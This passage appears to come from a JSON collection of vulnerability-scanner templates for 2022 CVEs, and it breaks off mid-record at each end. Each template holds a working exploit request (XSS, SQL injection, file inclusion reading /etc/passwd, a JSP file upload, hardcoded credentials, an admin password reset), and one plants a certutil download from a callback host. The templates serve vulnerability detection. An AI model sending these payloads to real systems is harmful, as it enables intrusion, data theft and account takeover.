Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script></textarea>","content=\"nextHaraj"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30489","info":{"name":"Wavlink WN-535G3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain);</script>","parent.location.replace(\"http://\")"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35413","info":{"name":"WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /webapi/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{username}}&password={{password}}\n"],"payloads":{"username":["systemi"],"password":["db/wp.no1"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"res_msg\":\"Authentication Success.\"","\"doc_id\":\"user_systemi\""],"condition":"and"},{"type":"word","part":"header","words":["WP_SESSID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31847","info":{"name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37299","info":{"name":"Shirne CMS 1.2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cm9vd"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42748","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-31984","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0378","info":{"name":"Microweber Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["mwui_init","onmousemove=\"alert(document.domain)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33891","info":{"name":"Apache Spark UI - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/doAs?=`{{url_encode(\"{{command}}\")}}`"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["19833-2202-EVC"]}]}]},{"id":"CVE-2022-4060","info":{"name":"WordPress User Post Gallery <=2.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["recordsFiltered"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1054","info":{"name":"WordPress RSVP and Event Management <2.7.8 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RSVP Status","\"First Name\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29464","info":{"name":"WSO2 Management - Arbitrary File Upload & Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /fileupload/toolsAny HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\nContent-Length: 348\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\n<% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n-----------------------------250033711231076532771336998311--\n","GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, 'WSO2-RCE-CVE-2022-29464')"]}]}]},{"id":"CVE-2022-2756","info":{"name":"Kavita <0.5.4.1 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/account/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n","POST /api/upload/upload-by-url HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"url\":\"http://oast.me/#.png\"}\n","GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["Interactsh Server"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*?)\""],"internal":true},{"type":"regex","name":"filename","group":1,"regex":["coverupload.(.*?).png"],"internal":true}]}]},{"id":"CVE-2022-2863","info":{"name":"WordPress WPvivid Backup <0.9.76 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"_ajax_nonce\":\"([0-9a-z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-31974","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47003","info":{"name":"Mura CMS <10.0.580 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-31845","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /live_check.shtml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","FW_Version=","LanIP="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39952","info":{"name":"Fortinet FortiNAC - Arbitrary File Write","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/configWizard/keyUpload.jsp"],"body":"--{{boundaryId}}\nContent-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n{{randstr}}\n--{{boundaryId}}--\n","headers":{"Content-Type":"multipart/form-data; boundary={{boundaryId}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["zipUploadSuccess","SuccessfulUpload"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31977","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_team HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-34045","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45037","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["<script>alert(document.domain)</script>","SESSION_TIMEOUT"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"username_fieldname_2","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-35493","info":{"name":"eShop 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["Search Result for \\\"><img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32024","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0599","info":{"name":"WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id=\"><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")"],"condition":"and"},{"type":"word","part":"body","words":["id=\"mmursp_id\" value=\"\\\"><svg/onload=alert(document.domain)>\" />"]}]}]},{"id":"CVE-2022-0760","info":{"name":"WordPress Simple Link Directory <7.7.2 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"vote_status\") || contains(body, \"critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-2314","info":{"name":"WordPress VR Calendar <=2.3.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["phpinfo","PHP Version"],"condition":"and"},{"type":"word","part":"body_1","words":["vrc-calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4320","info":{"name":"WordPress Events Calendar <1.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\"><script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["imgNavLeftXX\\\"><script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>({});","><script>alert(document.cookie)</script>.js"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23944","info":{"name":"Apache ShenYu Admin Unauth Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"query success\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38295","info":{"name":"Cuppa CMS v1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/classes/functions.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid_field=0&name_field=\"><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"><script>alert(document.domain)</script>","cuppa_html"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1392","info":{"name":"WordPress Videos sync PDF <=1.7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["failed to open stream: No such file or directory","REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0594","info":{"name":"WordPress Shareaholic <9.7.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plugin_version","shareaholic_server_reachable"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33119","info":{"name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: \"><script>alert(document.domain)</script><\"\n\nlanguage=en&user=user&pass=pass&submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code == 200","contains(body,'<script>alert(document.domain)</script><\\\"?cmd=')"],"condition":"and"}]}]},{"id":"CVE-2022-34328","info":{"name":"PMB 7.3.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>' target='cart_info"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46071","info":{"name":"Helmet Store Showroom v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername='+OR+1%3D1+--+-&password=1234\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")"],"condition":"and"}]}]},{"id":"CVE-2022-47966","info":{"name":"ManageEngine - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /SamlResponseServlet HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Unknown error occurred while processing your request"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-3934","info":{"name":"WordPress FlatPM <3.0.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")"],"condition":"and"}]}]},{"id":"CVE-2022-2544","info":{"name":"WordPress Ninja Job Board < 1.3.3 - Direct Request","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp/wp-content/uploads/wpjobboard/","{{BaseURL}}/wp-content/uploads/wpjobboard/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp/wp-content/uploads/wpjobboard","Index of /wp-content/uploads/wpjobboard"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24856","info":{"name":"Flyte Console <0.52.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cors_proxy/https://oast.me/"],"matchers":[{"type":"word","words":["Interactsh Server"]}]}]},{"id":"CVE-2022-31268","info":{"name":"Gitblit 1.9.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources//../WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com","gitblit.properties"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31976","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_request HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-0535","info":{"name":"WordPress E2Pdf <1.16.45 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_nonce={{nonce}}&e2pdf_user_email=&e2pdf_api=api.e2pdf.com&e2pdf_connection_timeout=300&e2pdf_processor=0&e2pdf_dev_update=0&e2pdf_url_format=siteurl&e2pdf_mod_rewrite=0&e2pdf_mod_rewrite_url=e2pdf%2F%25uid%25%2F&e2pdf_cache=0&e2pdf_cache=1&e2pdf_cache_fonts=0&e2pdf_cache_fonts=1&e2pdf_debug=0&e2pdf_hide_warnings=0&e2pdf_images_remote_request=0&e2pdf_images_timeout=30&e2pdf_revisions_limit=3&e2pdf_memory_time=0&e2pdf_developer=0&e2pdf_developer_ips=%3C%2Ftextarea%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&submit=Save+Changes\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, 'placeholder=\\\"Developer IPs\\\" ></textarea><svg/onload=alert(document.domain)>')","contains(header_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-1903","info":{"name":"ARMember < 3.4.8 - Unauthenticated Admin Account Takeover","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Your Password has been reset","arm_success_msg"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39195","info":{"name":"LISTSERV 17 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0212","info":{"name":"WordPress Spider Calendar <=1.5.65 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=window&callback=</script><img/src/onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["spider_Calendar_theme","</script><img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32018","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-4321","info":{"name":"PDF Generator for WordPress < 1.1.2 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","pdf-generator-for-wp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27985","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /alerts/alertLightbox.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nurl=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32444","info":{"name":"u5cms v8.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginsave.php?u=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-23881","info":{"name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?location=search HTTP/1.1\nHost: {{Hostname}}\nCookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1040","info":{"name":"Sophos Firewall <=18.5 MR3 - Remote Code 